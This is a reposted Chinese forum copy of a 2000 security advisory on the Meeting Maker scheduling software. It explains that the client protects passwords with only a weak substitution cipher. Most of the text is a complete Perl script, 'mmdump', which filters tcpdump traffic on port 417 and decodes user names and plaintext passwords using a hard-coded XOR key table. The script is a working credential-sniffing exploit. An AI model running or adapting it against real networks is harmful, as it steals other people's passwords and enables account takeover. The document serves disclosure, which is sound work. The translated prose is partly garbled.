发信人: williamlong()
整理人: williamlong(2000-05-09 12:52:16), 站内信件
|
Meeting Maker是一个网络日志软件包,估计有超过700,000部台式电脑装有
Meeting Maker。
Meeting Maker client端使用多码替代码,把密码传到Meeting Maker server端
。这种漏洞的危险性及如何减 弱攻击的更多信息可以看:http://support.on.c
om/support/mmxp.nsf/Public/Chronological。
我能够中途截止客户端到服务端的通信的密文。Meeting Maker管理员如果需
要检查正在传送的密码,这要求:
---审核。必须建立一个审核机制使一个用户不能选择和另一个用户相同的Meeti
ng Maker密码。
---要会判断被窃取的密码是否影响了Meetiing Maker客户端和服务端之前的通讯
通道。
我写了个脚本,这个脚本通过tcpdump连接来监视Meeting Maker的登录。对于每
一个登录,这个脚本
都能检查到。它能提供:Meeting Maker server端的IP,server端的机器名,客
户端的机器名和密码等信息。 但是它不能识别client-server的协议。这个脚本
运行在Meeting Maker
Java Client 6.04客户机和安装有Meeting Maker server的windows NT4 。.
#!/usr/bin/perl
#
# mmdump -- filters tcpdump output to find Meeting Maker passwords
#
# Author: Matt Power, [email protected]
# 24 April 2000
#
#
# usage: tcpdump -lnx -s 300 'tcp dst port 417' | mmdump
#
# (Note: Meeting Maker is a registered trademark of ON Technology
# Corporation)
#
#
@x = (20, 8, 9, 19, 9, 19, 1, 19, 20, 21, 16, 9, 4, 23, 1, 19,
20, 5, 15, 6, 20, 9, 13, 5, 1, 14, 4, 19, 16, 1, 3, 5);
$in = "";
$ipl = <>;
@ipf = split(/ /, $ipl);
@ic = split(/\./, $ipf[3]);
$ip = $ic[0] . "." . $ic[1] . "." . $ic[2] . "." . $ic[3];
while (<>)
{
if (/^\s/)
{
$in .= $_;
}
else
{
$ipl = $_;
@ipf = split(/ /, $ipl);
@ic = split(/\./, $ipf[3]);
$newip = $ic[0] . "." . $ic[1] . "." . $ic[2] . "." . $ic[3];
$in =~ s/\s//g;
$in =~ s/(..)/$1 /g;
if ($in =~ /.*7f ff ff .*?00 00 00 .*?00 00 00 (.*)/)
{
if ($1 !~ /^[0 ]+$/)
{
($s = $1) =~ s/ file://g;
$s1 = hex(substr($s, 0, 2));
$s = substr($s, 2, length($s) - 2);
$s0 = hex(substr($s, 0, 2));
$s3 = 2 * ($s0 + 3);
$s = substr($s, 2, length($s) - 2);
if ($s1 == $s0 + 1 and length($s) >= $s3)
{
$f = substr($s, 0, $s0 * 2);
$p = sprintf "H%d", 2 * $s0;
$fn = pack $p, $f;
$out = "Server Address: " . $ip . "\n";
$out .= "Server Name: " . $fn . "\n";
$s = substr($s, $s3, length($s) - $s3);
$s1 = hex(substr($s, 0, 2));
$s = substr($s, 2, length($s) - 2);
$s0 = hex(substr($s, 0, 2));
$s3 = 2 * ($s0 + 3);
$s = substr($s, 2, length($s) - 2);
if ($s1 == $s0 + 1 and length($s) >= $s3)
{
$f = substr($s, 0, $s0 * 2);
$p = sprintf "H%d", 2 * $s0;
$fn = pack $p, $f;
$out .= "User Name: " . $fn . "\nPassword: ";
$s = substr($s, $s3, length($s) - $s3);
$s1 = hex(substr($s, 0, 2));
$s = substr($s, 2, length($s) - 2);
$s0 = hex(substr($s, 0, 2));
$s = substr($s, 2, length($s) - 2);
if ($s1 == $s0 + 1 and length($s) == 2 * $s0)
{
for ($j = 0; $j < 2 * $s0; $j += 2)
{
$nr = hex(substr($s, $j, 2));
$i = $j / 2;
if ($nr >= 96)
{
$nr -= 96;
if ($i)
{
$out = "";
last;
}
$out .= chr(($nr ^ $x[$i]) + 32);
}
elsif ($nr >= 64)
{
$nr -= 64;
if (! $i)
{
$out = "";
last;
}
$out .= chr(($nr ^ $x[$i]) + 32);
}
elsif ($nr >= 32)
{
$nr -= 32;
$out .= chr(($nr ^ $x[$i]) +
($i ? 64 : 96));
}
else
{
$out .= chr(($nr ^ $x[$i]) +
($i ? 96 : 64));
}
}
if ($out ne "")
{
print $out . "\n\n";
}
}
}
}
}
}
$in = "";
$ip = $newip;
}
}
--
☆ 蓝色月光 ☆ http://williamlong.163.net
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 61.128.129.3]
|
|